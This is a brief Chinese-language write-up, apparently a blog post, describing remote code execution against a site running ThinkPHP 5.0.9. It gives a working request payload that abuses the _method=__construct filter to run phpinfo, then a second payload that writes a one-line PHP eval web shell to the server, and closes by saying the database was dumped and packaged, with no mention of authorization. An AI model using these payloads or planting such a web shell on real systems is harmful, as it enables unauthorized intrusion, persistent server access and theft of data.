记一次tp5.0.9RCE

目标

 

 常规报错

 

 直接说版本tp5.0.9，然后尝试payload

_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo打出phpinfo

顺便看了哈disable_function

 

 基本执行命令的payload都被禁了

还好payload多，直接拿下

s=file_put_contents('dd.php','<?php @eval($_POST[1]);')&_method=__construct&method=POST&filter[]=assert

 

 

 

 然后脱裤，打包，渗透结束